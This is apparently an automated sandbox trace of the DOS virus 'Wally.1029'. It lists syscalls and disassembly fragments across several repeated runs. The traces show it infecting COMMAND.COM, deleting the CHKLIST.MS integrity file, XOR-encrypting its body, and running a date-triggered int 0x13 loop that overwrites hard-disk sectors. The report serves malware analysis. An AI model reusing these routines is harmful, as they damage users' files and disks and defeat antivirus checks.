Sample viewer

vx.netlux.org/Virus.DOS.Wally.1029

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:04:00.519048615Z 42 PC: 12b33 | Get date 0x12b33: cmp cx, 0x7cb
0x12b37: jge 0x12b7c
0x12b39: cmp dh, 6
0x12b3c: jae 0x12b7c
0x12b3e: jmp 0x12b85
0x12b41: mov cx, 1
0x12b44: mov dx, 0x80
0x12b47: mov ax, 0x311
0x12b4a: mov bx, 0xb000
0x12b4d: mov es, bx
0x12b4f: int 0x13
0x12b51: jae 0x12b57
0x12b53: xor ah, ah
0x12b55: int 0x13
0x12b57: inc dh
0x12b59: cmp dh, 4
0x12b5c: jb 0x12b4a
0x12b5e: xor dh, dh
0x12b60: inc ch
0x12b62: cmp ch, 0x20
2018-12-17T22:04:00.522535323Z 44 PC: 12b80 | Get time 0x12b80: cmp dh, 1
0x12b83: je 0x12b41
0x12b85: pop bx
0x12b86: mov ah, 0x2c
0x12b88: int 0x21
0x12b8a: sub bx, 0x104
0x12b8e: mov word ptr [bx], cx
0x12b90: mov word ptr [bx + 2], dx
0x12b93: mov al, dh
0x12b95: mov dh, 0
0x12b97: mov ah, dh
0x12b99: mov dl, 2
0x12b9b: div dl
0x12b9d: cmp ah, 0
0x12ba0: jne 0x12baa
0x12ba2: mov byte ptr [0xff00], 0
0x12ba7: jmp 0x12baf
0x12baa: mov byte ptr [0xff00], 3
0x12baf: mov ah, 0x19
0x12bb1: int 0x21
2018-12-17T22:04:00.525486428Z 44 PC: 12b8a | Get time 0x12b8a: sub bx, 0x104
0x12b8e: mov word ptr [bx], cx
0x12b90: mov word ptr [bx + 2], dx
0x12b93: mov al, dh
0x12b95: mov dh, 0
0x12b97: mov ah, dh
0x12b99: mov dl, 2
0x12b9b: div dl
0x12b9d: cmp ah, 0
0x12ba0: jne 0x12baa
0x12ba2: mov byte ptr [0xff00], 0
0x12ba7: jmp 0x12baf
0x12baa: mov byte ptr [0xff00], 3
0x12baf: mov ah, 0x19
0x12bb1: int 0x21
0x12bb3: mov byte ptr [0xffbc], al
0x12bb6: mov ah, 0x47
0x12bb8: mov dh, 0
0x12bba: add al, 1
0x12bbc: mov dl, al
2018-12-17T22:04:00.528306188Z 25 PC: 12bb3 | Get default drive
2018-12-17T22:04:00.537446551Z 71 PC: 12bc3 | Get current directory
2018-12-17T22:04:00.540336048Z 26 PC: 12bcf | Set disk transfer address
2018-12-17T22:04:00.541370808Z 14 PC: 12bdb | Set default drive (Drive = 'C')
2018-12-17T22:04:00.542630083Z 59 PC: 12bec | Change current directory
2018-12-17T22:04:00.546878166Z 78 PC: 12c20 | Find first file
2018-12-17T22:04:00.552689706Z 67 PC: 12ca8 | Get or set file attributes
2018-12-17T22:04:00.558116869Z 67 PC: 12cb4 | Get or set file attributes
2018-12-17T22:04:00.908429065Z 61 PC: 12cbc | Open file (Filename = 'COMMAND.COM')
2018-12-17T22:04:00.915213755Z 66 PC: 12cc7 | Move file pointer
2018-12-17T22:04:00.917216904Z 66 PC: 12cd6 | Move file pointer
2018-12-17T22:04:00.920201582Z 63 PC: 12ce0 | Read file or device (Read 80 bytes on handle 5)
2018-12-17T22:04:00.926617727Z 65 PC: 12e6d | Delete file (Filename = 'CHKLIST.MS')
2018-12-17T22:04:00.93323243Z 66 PC: 12d4a | Move file pointer
2018-12-17T22:04:00.93558263Z 66 PC: 12d5b | Move file pointer
2018-12-17T22:04:00.937453787Z 63 PC: 12d65 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:04:00.940028225Z 66 PC: 12d6e | Move file pointer
2018-12-17T22:04:00.942388959Z 64 PC: 12d8d | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:04:00.945067991Z 66 PC: 12d96 | Move file pointer
2018-12-17T22:04:00.946507252Z 44 PC: 12db7 | Get time 0x12db7: add dl, dh
0x12db9: add dl, cl
0x12dbb: mov bx, 0x401
0x12dbe: mov byte ptr es:[bx], dl
0x12dc1: mov di, 0x81
0x12dc4: pop cx
0x12dc5: sub cx, di
0x12dc7: sub cx, 0x104
0x12dcb: xor byte ptr es:[di], dl
0x12dce: inc di
0x12dcf: loop 0x12dcb
0x12dd1: mov ax, es
0x12dd3: mov ds, ax
0x12dd5: push cs
0x12dd6: pop es
0x12dd7: pop bx
0x12dd8: mov ah, 0x40
0x12dda: mov cx, 0x402
0x12ddd: xor dx, dx
0x12ddf: int 0x21
2018-12-17T22:04:00.949300836Z 64 PC: 12de1 | Write file or device (Write 1026 bytes on handle 5)
2018-12-17T22:04:00.959453579Z 64 PC: 12ded | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:04:00.962121611Z 87 PC: 12dfe | Get or set file date and time
2018-12-17T22:04:00.963667308Z 62 PC: 12e06 | Close file
2018-12-17T22:04:00.965306247Z 67 PC: 12e12 | Get or set file attributes
2018-12-17T22:04:00.974946228Z 65 PC: 12e6d | Delete file (Filename = 'CHKLIST.MS')
2018-12-17T22:04:00.980362979Z 14 PC: 12e21 | Set default drive (Drive = 'A')
2018-12-17T22:04:00.981834384Z 59 PC: 12e28 | Change current directory
2018-12-17T22:04:00.985879851Z 9 PC: 12aa2 | Display string (String= 'ABCDE - This is a 100 byte COM test, 1994 ')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":1567,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:43:58.437483464Z 42 PC: 12b33 | Get date 0x12b33: cmp cx, 0x7cb
0x12b37: jge 0x12b7c
0x12b39: cmp dh, 6
0x12b3c: jae 0x12b7c
0x12b3e: jmp 0x12b85
0x12b41: mov cx, 1
0x12b44: mov dx, 0x80
0x12b47: mov ax, 0x311
0x12b4a: mov bx, 0xb000
0x12b4d: mov es, bx
0x12b4f: int 0x13
0x12b51: jae 0x12b57
0x12b53: xor ah, ah
0x12b55: int 0x13
0x12b57: inc dh
0x12b59: cmp dh, 4
0x12b5c: jb 0x12b4a
0x12b5e: xor dh, dh
0x12b60: inc ch
0x12b62: cmp ch, 0x20
2018-12-25T11:43:58.440074268Z 44 PC: 12b8a | Get time 0x12b8a: sub bx, 0x104
0x12b8e: mov word ptr [bx], cx
0x12b90: mov word ptr [bx + 2], dx
0x12b93: mov al, dh
0x12b95: mov dh, 0
0x12b97: mov ah, dh
0x12b99: mov dl, 2
0x12b9b: div dl
0x12b9d: cmp ah, 0
0x12ba0: jne 0x12baa
0x12ba2: mov byte ptr [0xff00], 0
0x12ba7: jmp 0x12baf
0x12baa: mov byte ptr [0xff00], 3
0x12baf: mov ah, 0x19
0x12bb1: int 0x21
0x12bb3: mov byte ptr [0xffbc], al
0x12bb6: mov ah, 0x47
0x12bb8: mov dh, 0
0x12bba: add al, 1
0x12bbc: mov dl, al
2018-12-25T11:43:58.443829521Z 25 PC: 12bb3 | Get default drive
2018-12-25T11:43:58.444965525Z 71 PC: 12bc3 | Get current directory
2018-12-25T11:43:58.448270839Z 26 PC: 12bcf | Set disk transfer address
2018-12-25T11:43:58.449407331Z 14 PC: 12bdb | Set default drive (Drive = 'C')
2018-12-25T11:43:58.451490801Z 59 PC: 12bec | Change current directory
2018-12-25T11:43:58.456715353Z 78 PC: 12c20 | Find first file
2018-12-25T11:43:58.461881818Z 67 PC: 12ca8 | Get or set file attributes
2018-12-25T11:43:58.469490998Z 67 PC: 12cb4 | Get or set file attributes
2018-12-25T11:44:02.32436908Z 61 PC: 12cbc | Open file (Filename = 'COMMAND.COM')
2018-12-25T11:44:02.331070788Z 66 PC: 12cc7 | Move file pointer
2018-12-25T11:44:02.333077345Z 66 PC: 12cd6 | Move file pointer
2018-12-25T11:44:02.334803015Z 63 PC: 12ce0 | Read file or device (Read 80 bytes on handle 5)
2018-12-25T11:44:02.355746387Z 65 PC: 12e6d | Delete file (Filename = 'CHKLIST.MS')
2018-12-25T11:44:02.360920206Z 66 PC: 12d4a | Move file pointer
2018-12-25T11:44:02.362181416Z 66 PC: 12d5b | Move file pointer
2018-12-25T11:44:02.364492987Z 63 PC: 12d65 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:44:02.367349243Z 66 PC: 12d6e | Move file pointer
2018-12-25T11:44:02.369511647Z 64 PC: 12d8d | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:44:02.372883557Z 66 PC: 12d96 | Move file pointer
2018-12-25T11:44:02.374528051Z 44 PC: 12db7 | Get time 0x12db7: add dl, dh
0x12db9: add dl, cl
0x12dbb: mov bx, 0x401
0x12dbe: mov byte ptr es:[bx], dl
0x12dc1: mov di, 0x81
0x12dc4: pop cx
0x12dc5: sub cx, di
0x12dc7: sub cx, 0x104
0x12dcb: xor byte ptr es:[di], dl
0x12dce: inc di
0x12dcf: loop 0x12dcb
0x12dd1: mov ax, es
0x12dd3: mov ds, ax
0x12dd5: push cs
0x12dd6: pop es
0x12dd7: pop bx
0x12dd8: mov ah, 0x40
0x12dda: mov cx, 0x402
0x12ddd: xor dx, dx
0x12ddf: int 0x21
2018-12-25T11:44:02.376899563Z 64 PC: 12de1 | Write file or device (Write 1026 bytes on handle 5)
2018-12-25T11:44:02.39453734Z 64 PC: 12ded | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:44:02.397651853Z 87 PC: 12dfe | Get or set file date and time
2018-12-25T11:44:02.399396037Z 62 PC: 12e06 | Close file
2018-12-25T11:44:02.402021378Z 67 PC: 12e12 | Get or set file attributes
2018-12-25T11:44:02.410896243Z 65 PC: 12e6d | Delete file (See above)
2018-12-25T11:44:02.415629408Z 14 PC: 12e21 | Set default drive (Drive = 'A')
2018-12-25T11:44:02.418277672Z 59 PC: 12e28 | Change current directory
2018-12-25T11:44:02.422503339Z 9 PC: 12aa2 | Display string (String= 'ABCDE - This is a 100 byte COM test, 1994 ')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":1567,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:43:58.485883361Z 42 PC: 12b33 | Get date 0x12b33: cmp cx, 0x7cb
0x12b37: jge 0x12b7c
0x12b39: cmp dh, 6
0x12b3c: jae 0x12b7c
0x12b3e: jmp 0x12b85
0x12b41: mov cx, 1
0x12b44: mov dx, 0x80
0x12b47: mov ax, 0x311
0x12b4a: mov bx, 0xb000
0x12b4d: mov es, bx
0x12b4f: int 0x13
0x12b51: jae 0x12b57
0x12b53: xor ah, ah
0x12b55: int 0x13
0x12b57: inc dh
0x12b59: cmp dh, 4
0x12b5c: jb 0x12b4a
0x12b5e: xor dh, dh
0x12b60: inc ch
0x12b62: cmp ch, 0x20
2018-12-25T11:43:58.487702267Z 44 PC: 12b8a | Get time 0x12b8a: sub bx, 0x104
0x12b8e: mov word ptr [bx], cx
0x12b90: mov word ptr [bx + 2], dx
0x12b93: mov al, dh
0x12b95: mov dh, 0
0x12b97: mov ah, dh
0x12b99: mov dl, 2
0x12b9b: div dl
0x12b9d: cmp ah, 0
0x12ba0: jne 0x12baa
0x12ba2: mov byte ptr [0xff00], 0
0x12ba7: jmp 0x12baf
0x12baa: mov byte ptr [0xff00], 3
0x12baf: mov ah, 0x19
0x12bb1: int 0x21
0x12bb3: mov byte ptr [0xffbc], al
0x12bb6: mov ah, 0x47
0x12bb8: mov dh, 0
0x12bba: add al, 1
0x12bbc: mov dl, al
2018-12-25T11:43:58.489161853Z 25 PC: 12bb3 | Get default drive
2018-12-25T11:43:58.489922505Z 71 PC: 12bc3 | Get current directory
2018-12-25T11:43:58.492129638Z 26 PC: 12bcf | Set disk transfer address
2018-12-25T11:43:58.492896007Z 14 PC: 12bdb | Set default drive (Drive = 'C')
2018-12-25T11:43:58.493703374Z 59 PC: 12bec | Change current directory
2018-12-25T11:43:58.496358655Z 78 PC: 12c20 | Find first file
2018-12-25T11:43:58.499898687Z 67 PC: 12ca8 | Get or set file attributes
2018-12-25T11:43:58.503092707Z 67 PC: 12cb4 | Get or set file attributes
2018-12-25T11:44:02.320722633Z 61 PC: 12cbc | Open file (Filename = 'COMMAND.COM')
2018-12-25T11:44:02.328313822Z 66 PC: 12cc7 | Move file pointer
2018-12-25T11:44:02.33007275Z 66 PC: 12cd6 | Move file pointer
2018-12-25T11:44:02.331806562Z 63 PC: 12ce0 | Read file or device (Read 80 bytes on handle 5)
2018-12-25T11:44:02.339643514Z 65 PC: 12e6d | Delete file (Filename = 'CHKLIST.MS')
2018-12-25T11:44:02.34572527Z 66 PC: 12d4a | Move file pointer
2018-12-25T11:44:02.346991332Z 66 PC: 12d5b | Move file pointer
2018-12-25T11:44:02.348763993Z 63 PC: 12d65 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:44:02.351404466Z 66 PC: 12d6e | Move file pointer
2018-12-25T11:44:02.352785077Z 64 PC: 12d8d | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:44:02.356643466Z 66 PC: 12d96 | Move file pointer
2018-12-25T11:44:02.358466628Z 44 PC: 12db7 | Get time 0x12db7: add dl, dh
0x12db9: add dl, cl
0x12dbb: mov bx, 0x401
0x12dbe: mov byte ptr es:[bx], dl
0x12dc1: mov di, 0x81
0x12dc4: pop cx
0x12dc5: sub cx, di
0x12dc7: sub cx, 0x104
0x12dcb: xor byte ptr es:[di], dl
0x12dce: inc di
0x12dcf: loop 0x12dcb
0x12dd1: mov ax, es
0x12dd3: mov ds, ax
0x12dd5: push cs
0x12dd6: pop es
0x12dd7: pop bx
0x12dd8: mov ah, 0x40
0x12dda: mov cx, 0x402
0x12ddd: xor dx, dx
0x12ddf: int 0x21
2018-12-25T11:44:02.369032883Z 64 PC: 12de1 | Write file or device (Write 1026 bytes on handle 5)
2018-12-25T11:44:02.379724829Z 64 PC: 12ded | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:44:02.382811706Z 87 PC: 12dfe | Get or set file date and time
2018-12-25T11:44:02.384626914Z 62 PC: 12e06 | Close file
2018-12-25T11:44:02.387782878Z 67 PC: 12e12 | Get or set file attributes
2018-12-25T11:44:02.396051169Z 65 PC: 12e6d | Delete file (See above)
2018-12-25T11:44:02.399613327Z 14 PC: 12e21 | Set default drive (Drive = 'A')
2018-12-25T11:44:02.401093246Z 59 PC: 12e28 | Change current directory
2018-12-25T11:44:02.404124122Z 9 PC: 12aa2 | Display string (String= 'ABCDE - This is a 100 byte COM test, 1994 ')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":1567,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:43:58.567687311Z 42 PC: 12b33 | Get date 0x12b33: cmp cx, 0x7cb
0x12b37: jge 0x12b7c
0x12b39: cmp dh, 6
0x12b3c: jae 0x12b7c
0x12b3e: jmp 0x12b85
0x12b41: mov cx, 1
0x12b44: mov dx, 0x80
0x12b47: mov ax, 0x311
0x12b4a: mov bx, 0xb000
0x12b4d: mov es, bx
0x12b4f: int 0x13
0x12b51: jae 0x12b57
0x12b53: xor ah, ah
0x12b55: int 0x13
0x12b57: inc dh
0x12b59: cmp dh, 4
0x12b5c: jb 0x12b4a
0x12b5e: xor dh, dh
0x12b60: inc ch
0x12b62: cmp ch, 0x20
2018-12-25T11:43:58.570149029Z 44 PC: 12b8a | Get time 0x12b8a: sub bx, 0x104
0x12b8e: mov word ptr [bx], cx
0x12b90: mov word ptr [bx + 2], dx
0x12b93: mov al, dh
0x12b95: mov dh, 0
0x12b97: mov ah, dh
0x12b99: mov dl, 2
0x12b9b: div dl
0x12b9d: cmp ah, 0
0x12ba0: jne 0x12baa
0x12ba2: mov byte ptr [0xff00], 0
0x12ba7: jmp 0x12baf
0x12baa: mov byte ptr [0xff00], 3
0x12baf: mov ah, 0x19
0x12bb1: int 0x21
0x12bb3: mov byte ptr [0xffbc], al
0x12bb6: mov ah, 0x47
0x12bb8: mov dh, 0
0x12bba: add al, 1
0x12bbc: mov dl, al
2018-12-25T11:43:58.572365032Z 25 PC: 12bb3 | Get default drive
2018-12-25T11:43:58.573222376Z 71 PC: 12bc3 | Get current directory
2018-12-25T11:43:58.576286427Z 26 PC: 12bcf | Set disk transfer address
2018-12-25T11:43:58.577531322Z 14 PC: 12bdb | Set default drive (Drive = 'C')
2018-12-25T11:43:58.578955852Z 59 PC: 12bec | Change current directory
2018-12-25T11:43:58.583611483Z 78 PC: 12c20 | Find first file
2018-12-25T11:43:58.588920275Z 67 PC: 12ca8 | Get or set file attributes
2018-12-25T11:43:58.594264031Z 67 PC: 12cb4 | Get or set file attributes
2018-12-25T11:44:02.322733143Z 61 PC: 12cbc | Open file (Filename = 'COMMAND.COM')
2018-12-25T11:44:02.329277531Z 66 PC: 12cc7 | Move file pointer
2018-12-25T11:44:02.330434037Z 66 PC: 12cd6 | Move file pointer
2018-12-25T11:44:02.332223901Z 63 PC: 12ce0 | Read file or device (Read 80 bytes on handle 5)
2018-12-25T11:44:02.342545218Z 65 PC: 12e6d | Delete file (Filename = 'CHKLIST.MS')
2018-12-25T11:44:02.348993854Z 66 PC: 12d4a | Move file pointer
2018-12-25T11:44:02.350723569Z 66 PC: 12d5b | Move file pointer
2018-12-25T11:44:02.352666004Z 63 PC: 12d65 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:44:02.35556062Z 66 PC: 12d6e | Move file pointer
2018-12-25T11:44:02.357624205Z 64 PC: 12d8d | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:44:02.360711809Z 66 PC: 12d96 | Move file pointer
2018-12-25T11:44:02.362483272Z 44 PC: 12db7 | Get time 0x12db7: add dl, dh
0x12db9: add dl, cl
0x12dbb: mov bx, 0x401
0x12dbe: mov byte ptr es:[bx], dl
0x12dc1: mov di, 0x81
0x12dc4: pop cx
0x12dc5: sub cx, di
0x12dc7: sub cx, 0x104
0x12dcb: xor byte ptr es:[di], dl
0x12dce: inc di
0x12dcf: loop 0x12dcb
0x12dd1: mov ax, es
0x12dd3: mov ds, ax
0x12dd5: push cs
0x12dd6: pop es
0x12dd7: pop bx
0x12dd8: mov ah, 0x40
0x12dda: mov cx, 0x402
0x12ddd: xor dx, dx
0x12ddf: int 0x21
2018-12-25T11:44:02.364961358Z 64 PC: 12de1 | Write file or device (Write 1026 bytes on handle 5)
2018-12-25T11:44:02.375364663Z 64 PC: 12ded | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:44:02.378379836Z 87 PC: 12dfe | Get or set file date and time
2018-12-25T11:44:02.380185958Z 62 PC: 12e06 | Close file
2018-12-25T11:44:02.392646696Z 67 PC: 12e12 | Get or set file attributes
2018-12-25T11:44:02.406459899Z 65 PC: 12e6d | Delete file (See above)
2018-12-25T11:44:02.412250894Z 14 PC: 12e21 | Set default drive (Drive = 'A')
2018-12-25T11:44:02.414925073Z 59 PC: 12e28 | Change current directory
2018-12-25T11:44:02.419077777Z 9 PC: 12aa2 | Display string (String= 'ABCDE - This is a 100 byte COM test, 1994 ')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":1567,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:43:59.050495908Z 42 PC: 12b33 | Get date 0x12b33: cmp cx, 0x7cb
0x12b37: jge 0x12b7c
0x12b39: cmp dh, 6
0x12b3c: jae 0x12b7c
0x12b3e: jmp 0x12b85
0x12b41: mov cx, 1
0x12b44: mov dx, 0x80
0x12b47: mov ax, 0x311
0x12b4a: mov bx, 0xb000
0x12b4d: mov es, bx
0x12b4f: int 0x13
0x12b51: jae 0x12b57
0x12b53: xor ah, ah
0x12b55: int 0x13
0x12b57: inc dh
0x12b59: cmp dh, 4
0x12b5c: jb 0x12b4a
0x12b5e: xor dh, dh
0x12b60: inc ch
0x12b62: cmp ch, 0x20
2018-12-25T11:43:59.052467536Z 44 PC: 12b8a | Get time 0x12b8a: sub bx, 0x104
0x12b8e: mov word ptr [bx], cx
0x12b90: mov word ptr [bx + 2], dx
0x12b93: mov al, dh
0x12b95: mov dh, 0
0x12b97: mov ah, dh
0x12b99: mov dl, 2
0x12b9b: div dl
0x12b9d: cmp ah, 0
0x12ba0: jne 0x12baa
0x12ba2: mov byte ptr [0xff00], 0
0x12ba7: jmp 0x12baf
0x12baa: mov byte ptr [0xff00], 3
0x12baf: mov ah, 0x19
0x12bb1: int 0x21
0x12bb3: mov byte ptr [0xffbc], al
0x12bb6: mov ah, 0x47
0x12bb8: mov dh, 0
0x12bba: add al, 1
0x12bbc: mov dl, al
2018-12-25T11:43:59.054130769Z 25 PC: 12bb3 | Get default drive
2018-12-25T11:43:59.055036254Z 71 PC: 12bc3 | Get current directory
2018-12-25T11:43:59.057622545Z 26 PC: 12bcf | Set disk transfer address
2018-12-25T11:43:59.058526689Z 14 PC: 12bdb | Set default drive (Drive = 'C')
2018-12-25T11:43:59.059470571Z 59 PC: 12bec | Change current directory
2018-12-25T11:43:59.069597002Z 78 PC: 12c20 | Find first file
2018-12-25T11:43:59.073543089Z 67 PC: 12ca8 | Get or set file attributes
2018-12-25T11:43:59.077205942Z 67 PC: 12cb4 | Get or set file attributes
2018-12-25T11:43:59.958168506Z 61 PC: 12cbc | Open file (Filename = 'COMMAND.COM')
2018-12-25T11:43:59.966016691Z 66 PC: 12cc7 | Move file pointer
2018-12-25T11:43:59.968032446Z 66 PC: 12cd6 | Move file pointer
2018-12-25T11:43:59.972032579Z 63 PC: 12ce0 | Read file or device (Read 80 bytes on handle 5)
2018-12-25T11:43:59.979378441Z 65 PC: 12e6d | Delete file (Filename = 'CHKLIST.MS')
2018-12-25T11:43:59.985933068Z 66 PC: 12d4a | Move file pointer
2018-12-25T11:43:59.987932167Z 66 PC: 12d5b | Move file pointer
2018-12-25T11:44:00.002205317Z 63 PC: 12d65 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:44:00.005646762Z 66 PC: 12d6e | Move file pointer
2018-12-25T11:44:00.007694878Z 64 PC: 12d8d | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:44:00.013517237Z 66 PC: 12d96 | Move file pointer
2018-12-25T11:44:00.015554477Z 44 PC: 12db7 | Get time 0x12db7: add dl, dh
0x12db9: add dl, cl
0x12dbb: mov bx, 0x401
0x12dbe: mov byte ptr es:[bx], dl
0x12dc1: mov di, 0x81
0x12dc4: pop cx
0x12dc5: sub cx, di
0x12dc7: sub cx, 0x104
0x12dcb: xor byte ptr es:[di], dl
0x12dce: inc di
0x12dcf: loop 0x12dcb
0x12dd1: mov ax, es
0x12dd3: mov ds, ax
0x12dd5: push cs
0x12dd6: pop es
0x12dd7: pop bx
0x12dd8: mov ah, 0x40
0x12dda: mov cx, 0x402
0x12ddd: xor dx, dx
0x12ddf: int 0x21
2018-12-25T11:44:00.018476506Z 64 PC: 12de1 | Write file or device (Write 1026 bytes on handle 5)
2018-12-25T11:44:00.030018832Z 64 PC: 12ded | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:44:00.033107616Z 87 PC: 12dfe | Get or set file date and time
2018-12-25T11:44:00.0348143Z 62 PC: 12e06 | Close file
2018-12-25T11:44:00.037695043Z 67 PC: 12e12 | Get or set file attributes
2018-12-25T11:44:00.049547904Z 65 PC: 12e6d | Delete file (See above)
2018-12-25T11:44:00.056031096Z 14 PC: 12e21 | Set default drive (Drive = 'A')
2018-12-25T11:44:00.058545045Z 59 PC: 12e28 | Change current directory
2018-12-25T11:44:00.064464325Z 9 PC: 12aa2 | Display string (String= 'ABCDE - This is a 100 byte COM test, 1994 ')